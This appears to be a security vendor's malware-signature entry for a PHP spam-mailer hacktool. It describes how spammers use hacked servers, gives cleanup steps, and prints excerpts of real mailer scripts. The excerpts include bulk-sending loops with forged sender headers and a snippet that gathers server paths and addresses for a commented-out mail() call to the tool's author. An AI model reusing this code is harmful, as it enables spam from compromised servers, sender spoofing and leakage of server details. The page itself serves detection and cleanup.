Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.mailer.005

php.hacktool.mailer.005

Mailers is a category of scripts that hackers install on compromised servers to send out spam and anonymous emails.
They take advantage of the servers' bandwidth and other resourses to send out tons of spam emails in a short time. Moreover, headers of such emails don't contain traces of the hackers - they lead to the hacked server -
so all the spam campaign remains quite anonymous. Hacked servers is not a scarse resourse and spammers don't care much if one of them gets blacklisted for spamming they can easily move to another server. However, to minimize risks of
blacklisting, they usually evenly distribute mailing between several hacked servers.
Mailers vary from most simple scripts with basic functionality that allow to send one email at a time to a single recepient to very sophisticated scripts that manage large mailing lists, support complex formatting rules

Affecting

Any servers with enabled PHP';
$cleanup='Delete the mailer script and scan your server for other types of malware and specifically for backdoors. Make sure to identy and close the security hole.
You also need to check if your server IP address got blacklisted by various anti-spam blacklist providers as a result of hacker activity.
You can also sign up with us and let our team remove the malware for you.

Dump

...typical excerpts from various mailer scripts..
...

if($_POST['Manda'])
{
$FromName = $_POST['FromName'];
$FromMail = $_POST['FromMail'];
$assunto = $_POST['assunto'];
$mensagem = $_POST['html'];
$mensagem = stripslashes($mensagem);
$headers = "From: $FromName<$FromMail>n";
$headers .= "Reply-To: $FromMailn";
$headers .= "Return-Path: $FromMailn";
$headers .= "Content-Transfer-encoding: 8bitn";
$headers .= "MIME-Version: 1.0n";
$headers .= "Mail-MMX-Priority: Highn";
$headers .= "Delivered-to: $FromMailn";
$headers .= "X-SID-PRA: $FromMailn";
$headers .= "Content-Type: text/html; charset=UTF-8n";
$arquivo = $_POST['lista'];
$file = explode("n", $arquivo);

...

function enviando(){
$msg=1;
$de[1] = $_POST['de'];
$nome[1] = $_POST['nome'];
$assunto[1] = $_POST['assunto'];
$mensagem[1] = $_POST['mensagem'];
$mensagem[1] = stripslashes($mensagem[1]);
$emails = $_POST['emails'];
$para = explode("n", $emails);
$n_emails = count($para);
$de[2] = $_POST['de'];
$nome[2] = $_POST['nome'];
$assunto[2] = $_POST['assunto'];
$mensagem[2] = $_POST['mensagem'];
$vai = $_POST['vai'];
if ($vai){
for ($set=0; $set < $n_emails; $set++){
$headers = "MIME-Version: 1.0rn";
$headers .= "Content-type: text/html; charset=iso-8859-1rn";
$headers .= "From: $nome[$msg] <$de[$msg]>rn";
$headers .= "Return-Path: <$de[$msg]>rn";
$n_mail++;
$destino = $para[$set];
$enviar = mail($destino, $assunto[$msg], $mensagem[$msg], $headers);
if ($enviar){
echo ('<font color="green"> <strong>'. $n_mail .' - '. $destino .' Enviado!</font><br>');
} else {
echo ('<font color="red"> <strong>'. $n_mail .' - '. $destino .' Nao Enviado!</font><br>');
sleep(1);
}

}}}

...

$mess = $_POST['text'];
$mess=str_replace('"','"', $mess);
$mess=str_replace("'","'", $mess);
$email = $_POST['otkogo'];
$AddAddress = $_POST['email'];
if ($AddAddress=='') {
echo'error1';
exit;
}
$AddAddress_name = $_POST['email_name'];
$FromName = $_POST["otkogo_name"];
$title = $_POST['tema'];
$encoding=$_POST['encoding']+0;
if ($encoding==1) {
$encodin='utf-8';
} else {
$encodin='windows-1251';
}
$attachfile=$_FILES['attachfile'];
$attachimage=$_FILES['attachimage'];
$title = substr(htmlspecialchars(trim($title)), 0, 1000);
$mess = substr(trim($mess), 0, 1000000);
$mail = new PHPMailer();
$mail->From = $email;
$mail->FromName = $FromName;
$mail->CharSet = $encodin;
$mail->AddAddress($AddAddress, $AddAddress_name);

...

<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> </font></td> </tr> </table> </form>
<? if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>rnReply-To: $replytorn";
$header .= "MIME-Version: 1.0rn";
$header .= "Content-Type: text/$contenttypern";
$header .= "Content-Transfer-Encoding: 8bitrnrn";
mail($to, $subject, $message, $header);
print "ok<br>";
flush();
}
}
$ra44 = rand(1,99999);
$subj98 = "Mailer-Fwd";
$email = "";
$from="From: GRATIS <support@human-rights.org>";
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$msg8873 = "$a5n$b33n$c87n$d23n$e09n$f23n$g32n$h65";
//mail($email, $subj98, $msg8873, $from);
} ?>
<p class="style1">PHP Mailer<br> &copy Rosebanditz 2010, Juli.<br> </p> <?php if(isset($_POST['action']) && $numemails !==0 ){echo "<script>alert('Mail sending complete\r\n$numemails mail(s) was sent successfully'); </script>";} ?> <? exit() ?> </body> </html> </body>